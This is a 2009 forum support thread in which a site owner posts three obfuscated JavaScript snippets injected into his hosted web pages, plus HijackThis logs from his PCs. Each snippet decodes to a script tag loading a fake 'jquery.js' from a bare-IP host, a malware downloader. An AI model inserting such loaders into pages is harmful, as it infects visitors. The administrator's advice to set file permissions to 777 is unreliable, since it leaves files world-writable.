Java script added to my web pages

View previous topic View next topic Go down

Java script added to my web pages

Post by rld on Sun Apr 12, 2009 2:59 pm

I got a virus notification when checkingone of my own web pages. When I did a view source, I found the following added to the .html code just before the <body> tag. Can you tell me what it is and if I might have picked up an infection?

These Java scripts were found at the beginning of my online web page files. The date/times are when the files were changed.

Apr 6 2009 ~1230 GMT

<script language=javascript><!--
document.write(unescape('gxO%3CscVA9rOpipOptXSP%20srcTK2%3D%2F%2F9gT4%2EOp24VA97%2EYV2%2E1gxO95%2FjqueVA9rgTy%2EjOpsTK2%3E%3COp%2FscrgxOiRWKpt%3E').replace(/gT|RWK|gxO|VA9|YV|Op|XSP|VAr|TK2/g,""));
--></script>

Apr 9 2006 ~1549 GMT

<script language=javascript><!--
document.write(unescape('Ge1%3Cg7scfXripB9Jt%20siwrfXc%3D%2F%2F9uHK4Ge1%2E24fX7%2E2Ge1%2EGe1194e5%2FjGe1quGe1er4ey%2EhdmjfXshdm%3E%3C%2FshdmcGe1rip4et%3E').replace(/4e|Ge1|0lM|uHK|iw|B9J|hdm|fX|g7/g,""));
--></script>

Apr 11 2009 ~0017 GMT

<script language=javascript><!--
document.write(unescape('rAD%3CXWHscrADrrADiXWHpt%20src%3D%2F%2FG394%2EQTL2Pfy4XWH7%2E2QTL%2EXWH1pl95qrJ%2FjG3quQTLeXWHry%2EPfyjsrAD%3E%3CqrJ%2FTpscTprrADiQTLprADt%3E').replace(/qrJ|Tp|QTL|pl|Pfy|rAD|G3|g7I|XWH/g,""));
--></script>

I should note that the server is a Unix system of some type, and that it belongs to the ISP, not me, so I don't have control other than to upload files. I did re-upload all .html files to clear this thing. Norton flagged it as a downloader.

I'm in the process of downloading the required files for checking my PC. Unfortunately I'm still living in the dark ages with a dial-up line so it'll be a while before I'm completely set up.

Thanks
rld

rld
Novice
Novice

Posts Posts : 11
Joined Joined : 2009-04-12
OS OS : XP
Points Points : 27955
# Likes # Likes : 0

View user profile

Back to top Go down

Re: Java script added to my web pages

Post by Belahzur on Sun Apr 12, 2009 3:01 pm

Hello.
Your website is compromised, is your site hosted by IX web hosting by any chance?

See here:
[You must be registered and logged in to see this link.]

That sounds much like your problem.


[You must be registered and logged in to see this link.] - [You must be registered and logged in to see this link.] - Please PM me if I fail to respond within 24hrs.


Belahzur
Administrator
Administrator

Posts Posts : 34916
Joined Joined : 2008-08-03
Gender Gender : Male
OS OS : XP SP3 Media Centre
Points Points : 245059
# Likes # Likes : 1

View user profile

Back to top Go down

Re: Java script added to my web pages

Post by rld on Sun Apr 12, 2009 3:12 pm

No, my websites are on a local ISP, Internet Duncan, now a part of Wichita Online. The site URL is [You must be registered and logged in to see this link.] and one of the specific sites that was hacked is [You must be registered and logged in to see this link.] . I did observe that the sites (there were 3 of mine) that were hacked were done in alphabetical order, so I'm watching my personal site on a daily basis. All of this occurred within the last week.

rld
Novice
Novice

Posts Posts : 11
Joined Joined : 2009-04-12
OS OS : XP
Points Points : 27955
# Likes # Likes : 0

View user profile

Back to top Go down

Re: Java script added to my web pages

Post by Belahzur on Sun Apr 12, 2009 3:19 pm

Do you know what chmod is? If you don't change the settings in that, that leaves holes hackers can use.

The permissions in chmod need setting to 777.


[You must be registered and logged in to see this link.] - [You must be registered and logged in to see this link.] - Please PM me if I fail to respond within 24hrs.


Belahzur
Administrator
Administrator

Posts Posts : 34916
Joined Joined : 2008-08-03
Gender Gender : Male
OS OS : XP SP3 Media Centre
Points Points : 245059
# Likes # Likes : 1

View user profile

Back to top Go down

Re: Java script added to my web pages

Post by rld on Sun Apr 12, 2009 3:35 pm

Yes, I understand chmod, but I thought 777 was RWX for everybody. I can check the settings on my files through FTP but can't change them. They are all 644 (me r/w, all others read-only).

rld
Novice
Novice

Posts Posts : 11
Joined Joined : 2009-04-12
OS OS : XP
Points Points : 27955
# Likes # Likes : 0

View user profile

Back to top Go down

Re: Java script added to my web pages

Post by Belahzur on Sun Apr 12, 2009 3:42 pm

Are you an administrator on that FTP?


[You must be registered and logged in to see this link.] - [You must be registered and logged in to see this link.] - Please PM me if I fail to respond within 24hrs.


Belahzur
Administrator
Administrator

Posts Posts : 34916
Joined Joined : 2008-08-03
Gender Gender : Male
OS OS : XP SP3 Media Centre
Points Points : 245059
# Likes # Likes : 1

View user profile

Back to top Go down

Re: Java script added to my web pages

Post by rld on Sun Apr 12, 2009 3:58 pm

Unfortunately no. Just have user priveliges. They have their system supposedly locked up pretty tight. However, the ISP just changed hands and someone may have left a hole open. I'll check with their tech support later this afternoon when someone's there.

rld
Novice
Novice

Posts Posts : 11
Joined Joined : 2009-04-12
OS OS : XP
Points Points : 27955
# Likes # Likes : 0

View user profile

Back to top Go down

Re: Java script added to my web pages

Post by Belahzur on Sun Apr 12, 2009 4:00 pm

Okay. Smile


[You must be registered and logged in to see this link.] - [You must be registered and logged in to see this link.] - Please PM me if I fail to respond within 24hrs.


Belahzur
Administrator
Administrator

Posts Posts : 34916
Joined Joined : 2008-08-03
Gender Gender : Male
OS OS : XP SP3 Media Centre
Points Points : 245059
# Likes # Likes : 1

View user profile

Back to top Go down

Re: Java script added to my web pages

Post by rld on Sun Apr 12, 2009 4:09 pm

Can you tell me what those Java scripts would do? They appear to be encrypted somehow, so it's not immediately obvious.

rld
Novice
Novice

Posts Posts : 11
Joined Joined : 2009-04-12
OS OS : XP
Points Points : 27955
# Likes # Likes : 0

View user profile

Back to top Go down

Re: Java script added to my web pages

Post by Belahzur on Sun Apr 12, 2009 4:24 pm

They install malware. This piece of malware causes Google/search engine hijacks, and stops you using cmd/regedit and tools that use them. It hides in your online audio registry key loading point.


[You must be registered and logged in to see this link.] - [You must be registered and logged in to see this link.] - Please PM me if I fail to respond within 24hrs.


Belahzur
Administrator
Administrator

Posts Posts : 34916
Joined Joined : 2008-08-03
Gender Gender : Male
OS OS : XP SP3 Media Centre
Points Points : 245059
# Likes # Likes : 1

View user profile

Back to top Go down

Re: Java script added to my web pages

Post by rld on Sun Apr 12, 2009 8:03 pm

Finally got HJT run. Here's the log file from my laptop which I think is clean Let me think :

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 2:59:30 PM, on 4/12/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\Explorer.EXE
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Symantec AntiVirus\DefWatch.exe
C:\WINNT\system32\HPZipm12.exe
C:\WINNT\System32\svchost.exe
C:\Program Files\Symantec AntiVirus\Rtvscan.exe
C:\WINNT\GWMDMMSG.exe
C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\WINNT\System32\hkcmd.exe
C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\PROGRA~1\SYMANT~1\VPTray.exe
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
C:\WINNT\system32\ICO.EXE
C:\Program Files\TimeCalendarLE\TCLE.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\WINNT\system32\Pelmiced.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\NETGEAR\WG511v2\wlancfg5.exe
C:\Program Files\Microsoft Office\Office10\msoffice.exe
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe
C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\WINNT\system32\NOTEPAD.EXE
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Install\hijackgpthis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = [You must be registered and logged in to see this link.]
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = [You must be registered and logged in to see this link.]
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = [You must be registered and logged in to see this link.]
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = [You must be registered and logged in to see this link.]
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O4 - HKLM\..\Run: [GWMDMMSG] GWMDMMSG.exe
O4 - HKLM\..\Run: [SynTPLpr] C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [GWMDMpi] C:\WINNT\GWMDMpi.exe
O4 - HKLM\..\Run: [IgfxTray] C:\WINNT\System32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINNT\System32\hkcmd.exe
O4 - HKLM\..\Run: [AdaptecDirectCD] "C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe"
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [vptray] C:\PROGRA~1\SYMANT~1\VPTray.exe
O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [Mouse Suite 98 Daemon] ICO.EXE
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Ad-Watch] C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKCU\..\Run: [TimeCalendar] "C:\Program Files\TimeCalendarLE\TCLE.exe" auto
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKUS\S-1-5-18\..\Run: [DWQueuedReporting] "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [DWQueuedReporting] "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (User 'Default user')
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O4 - Global Startup: NETGEAR Smart Wizard.lnk = ?
O8 - Extra context menu item: E&xport to Microsoft Excel - [You must be registered and logged in to see this link.]
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINNT\System32\Shdocvw.dll
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} (PCPitstop Utility) - [You must be registered and logged in to see this link.]
O16 - DPF: {0F04992B-E661-4DB9-B223-903AB628225D} (DoMoreRunExe.DoMoreRun) - [You must be registered and logged in to see this link.] Files\gateway\Do More\DoMoreRunExe.CAB
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - [You must be registered and logged in to see this link.]
O16 - DPF: {25365FF3-2746-4230-9DA7-163CCA318309} (Automatic Driver Installation Control) - [You must be registered and logged in to see this link.]
O16 - DPF: {511073AD-BE56-4D43-AE68-93390514385E} (TechToolsActivex.TechTools) - [You must be registered and logged in to see this link.]
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - [You must be registered and logged in to see this link.]
O16 - DPF: {739E8D90-2F4C-43AD-A1B8-66C356FCEA35} (RunExeActiveX.RunExe) - [You must be registered and logged in to see this link.]
O16 - DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} - [You must be registered and logged in to see this link.]
O17 - HKLM\System\CCS\Services\Tcpip\..\{38618AF6-B631-4EE4-9E21-F81558F59E8F}: NameServer = 205.162.224.251
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
O23 - Service: Symantec AntiVirus Definition Watcher (DefWatch) - Symantec Corporation - C:\Program Files\Symantec AntiVirus\DefWatch.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: Lavasoft Ad-Aware Service - Lavasoft - C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINNT\system32\HPZipm12.exe
O23 - Service: SAVRoam (SavRoam) - symantec - C:\Program Files\Symantec AntiVirus\SavRoam.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: Symantec AntiVirus - Symantec Corporation - C:\Program Files\Symantec AntiVirus\Rtvscan.exe

--
End of file - 7600 bytes

rld
Novice
Novice

Posts Posts : 11
Joined Joined : 2009-04-12
OS OS : XP
Points Points : 27955
# Likes # Likes : 0

View user profile

Back to top Go down

Re: Java script added to my web pages

Post by rld on Sun Apr 12, 2009 8:39 pm

And this is the HJT log from my desktop machine which I think is sicker that I am! I tried regedit and got a blank screen.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 3:34:49 PM, on 4/12/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Symantec AntiVirus\DefWatch.exe
C:\PROGRA~1\Iomega\System32\AppServices.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Symantec AntiVirus\Rtvscan.exe
C:\windows\system\hpsysdrv.exe
C:\WINDOWS\system32\S3tray2.exe
C:\WINDOWS\system32\fxssvc.exe
C:\WINDOWS\explorer.exe
C:\Program Files\Canon\CAL\CALMAIN.exe
C:\WINDOWS\system32\msiexec.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Documents and Settings\Owner\Desktop\hijackgpthis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = [You must be registered and logged in to see this link.]
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = [You must be registered and logged in to see this link.]
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = [You must be registered and logged in to see this link.]
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = [You must be registered and logged in to see this link.]
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = [You must be registered and logged in to see this link.]
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = [You must be registered and logged in to see this link.]
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = [You must be registered and logged in to see this link.]
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = [You must be registered and logged in to see this link.]
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = [You must be registered and logged in to see this link.]
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = [You must be registered and logged in to see this link.]
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = [You must be registered and logged in to see this link.]
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = [You must be registered and logged in to see this link.]
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Duncan2
O2 - BHO: Yahoo! Companion BHO - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Common\ycomp5_1_6_0.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - c:\Program Files\Microsoft Money\System\mnyviewer.dll
O3 - Toolbar: &Yahoo! Companion - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Common\ycomp5_1_6_0.dll
O4 - HKLM\..\Run: [hpsysdrv] c:\windows\system\hpsysdrv.exe
O4 - HKLM\..\Run: [Recguard] C:\WINDOWS\SMINST\RECGUARD.EXE
O4 - HKLM\..\Run: [S3TRAY2] S3tray2.exe
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\System32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe
O4 - HKLM\..\Run: [USB] C:\WINDOWS\system32\usb.exe
O4 - HKLM\..\Run: [OneTouch Monitor] C:\PROGRA~1\VISION~1\ONETOU~2.EXE
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [vptray] C:\PROGRA~1\SYMANT~1\VPTray.exe
O4 - HKLM\..\Run: [Logitech Hardware Abstraction Layer] KHALMNPR.EXE
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKCU\..\Run: [TimeCalendar] "C:\Program Files\TimeCalendarLE\TCLE.exe" auto
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKUS\S-1-5-18\..\Run: [DWQueuedReporting] "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [DWQueuedReporting] "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (User 'Default user')
O4 - Global Startup: Adobe Gamma Loader.lnk = ?
O4 - Global Startup: APC UPS Status.lnk = C:\Program Files\APC\APC PowerChute Personal Edition\Display.exe
O4 - Global Startup: DING!.lnk.disabled
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - [You must be registered and logged in to see this link.]
O8 - Extra context menu item: Yahoo! Dictionary - [You must be registered and logged in to see this link.] Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! Search - [You must be registered and logged in to see this link.] Files\Yahoo!\Common/ycsrch.htm
O9 - Extra button: Messenger - {4528BBE0-4E08-11D5-AD55-00010333D0AD} - C:\Program Files\Yahoo!\Messenger\yhexbmes0411.dll
O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {4528BBE0-4E08-11D5-AD55-00010333D0AD} - C:\Program Files\Yahoo!\Messenger\yhexbmes0411.dll
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: MoneySide - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - c:\Program Files\Microsoft Money\System\mnyviewer.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O15 - Trusted Zone: *.My Computer
O15 - Trusted Zone: [You must be registered and logged in to see this link.]
O16 - DPF: {05CA9FB0-3E3E-4B36-BF41-0E3A5CAA8CD8} (Office Genuine Advantage Validation Tool) - [You must be registered and logged in to see this link.]
O16 - DPF: {15B782AF-55D8-11D1-B477-006097098764} (Macromedia Authorware Web Player Control) - [You must be registered and logged in to see this link.]
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - [You must be registered and logged in to see this link.]
O16 - DPF: {1F2F4C9E-6F09-47BC-970D-3C54734667FE} (LSSupCtl Class) - [You must be registered and logged in to see this link.]
O16 - DPF: {3451DEDE-631F-421C-8127-FD793AFC6CC8} (ActiveDataInfo Class) - [You must be registered and logged in to see this link.]
O16 - DPF: {44990200-3C9D-426D-81DF-AAB636FA4345} (Symantec SmartIssue) - [You must be registered and logged in to see this link.]
O16 - DPF: {44990301-3C9D-426D-81DF-AAB636FA4345} (Symantec Script Runner Class) - [You must be registered and logged in to see this link.]
O16 - DPF: {54BE6B6F-3056-470B-97E1-BB92E051B6C4} (DeviceEnum Class) - [You must be registered and logged in to see this link.]
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - [You must be registered and logged in to see this link.]
O16 - DPF: {768D513A-C75B-4FAA-8452-E906CDAB6545} (FVLiteLoad Class) - [You must be registered and logged in to see this link.]
O16 - DPF: {A17E30C4-A9BA-11D4-8673-60DB54C10000} (YahooYMailTo Class) - [You must be registered and logged in to see this link.]
O16 - DPF: {A9F8D9EC-3D0A-4A60-BD82-FBD64BAD370D} (DDRevision Class) - [You must be registered and logged in to see this link.]
O16 - DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} (PopCapLoader Object) - [You must be registered and logged in to see this link.]
O23 - Service: APC UPS Service - American Power Conversion Corporation - C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe
O23 - Service: Canon Camera Access Library 8 (CCALib8) - Canon Inc. - C:\Program Files\Canon\CAL\CALMAIN.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
O23 - Service: Symantec AntiVirus Definition Watcher (DefWatch) - Symantec Corporation - C:\Program Files\Symantec AntiVirus\DefWatch.exe
O23 - Service: Iomega App Services - Iomega Corporation - C:\PROGRA~1\Iomega\System32\AppServices.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: NVIDIA Driver Helper Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: SAVRoam (SavRoam) - symantec - C:\Program Files\Symantec AntiVirus\SavRoam.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: Symantec AntiVirus - Symantec Corporation - C:\Program Files\Symantec AntiVirus\Rtvscan.exe

--
End of file - 10478 bytes

rld
Novice
Novice

Posts Posts : 11
Joined Joined : 2009-04-12
OS OS : XP
Points Points : 27955
# Likes # Likes : 0

View user profile

Back to top Go down

Re: Java script added to my web pages

Post by Belahzur on Sun Apr 12, 2009 9:31 pm

Hello.
When you tried regedit, did your machine freeze? I know it does that to it if the malware I told you about is active.


[You must be registered and logged in to see this link.] - [You must be registered and logged in to see this link.] - Please PM me if I fail to respond within 24hrs.


Belahzur
Administrator
Administrator

Posts Posts : 34916
Joined Joined : 2008-08-03
Gender Gender : Male
OS OS : XP SP3 Media Centre
Points Points : 245059
# Likes # Likes : 1

View user profile

Back to top Go down

Re: Java script added to my web pages

Post by rld on Sun Apr 12, 2009 10:09 pm

It did not totally freeze, but I couldn't start anything. The machine response is such that I can run 2 or 3 programs, then it stops responding to anything but a long push on the power button, which does turn it off. Then I can start over. The HiJackThis log is in my previous post.

rld
Novice
Novice

Posts Posts : 11
Joined Joined : 2009-04-12
OS OS : XP
Points Points : 27955
# Likes # Likes : 0

View user profile

Back to top Go down

Re: Java script added to my web pages

Post by Belahzur on Sun Apr 12, 2009 10:28 pm

The logs look fine.
Doesn't sound like malware though.


[You must be registered and logged in to see this link.] - [You must be registered and logged in to see this link.] - Please PM me if I fail to respond within 24hrs.


Belahzur
Administrator
Administrator

Posts Posts : 34916
Joined Joined : 2008-08-03
Gender Gender : Male
OS OS : XP SP3 Media Centre
Points Points : 245059
# Likes # Likes : 1

View user profile

Back to top Go down

Re: Java script added to my web pages

Post by rld on Sun Apr 12, 2009 10:56 pm

Given that the PC is 8 years old, I guess it could be deterioration of the OS. I remember that I had to rebuild my Win95 machine about once a year.

I did have my local ISP set up as a "Trusted Site" with IE, so that malware downloader could have gotten in there from my hacked web sites. I talked with my ISP this afternoon and they had no knowledge of any hacks. About ready to drop them after 10+ years.

Is there anything else I can try to see what might be causing the problem?

One additional note, my external hard drive (data files only, no executables) starting dying about the same time. Might that be a source of the problem?

rld
Novice
Novice

Posts Posts : 11
Joined Joined : 2009-04-12
OS OS : XP
Points Points : 27955
# Likes # Likes : 0

View user profile

Back to top Go down

Re: Java script added to my web pages

Post by Belahzur on Sun Apr 12, 2009 11:10 pm

Hello.
I can see some trusted sites set in the Hijack This log. You can fix that if you want to.

Hardware failure isn't normally caused by malware, but malware does damage the OS somewhat.

If anything can be done, the chmod of your files needs changing.


[You must be registered and logged in to see this link.] - [You must be registered and logged in to see this link.] - Please PM me if I fail to respond within 24hrs.


Belahzur
Administrator
Administrator

Posts Posts : 34916
Joined Joined : 2008-08-03
Gender Gender : Male
OS OS : XP SP3 Media Centre
Points Points : 245059
# Likes # Likes : 1

View user profile

Back to top Go down

Re: Java script added to my web pages

Post by rld on Sun Apr 12, 2009 11:56 pm

Unfortunately the web site is mostly out of reach to me in that respect, unless there's a chmod equivalent in [You must be registered and logged in to see this link.] I have a new PC on order to replace the old dinosaur anyway, just waited a couple of weeks too long to order it. Thanks for your help. I'll try to rebuild the old one after the new one arrives. Is there any such thing as too many computes? Cheesy Grin (sparkly

rld
Novice
Novice

Posts Posts : 11
Joined Joined : 2009-04-12
OS OS : XP
Points Points : 27955
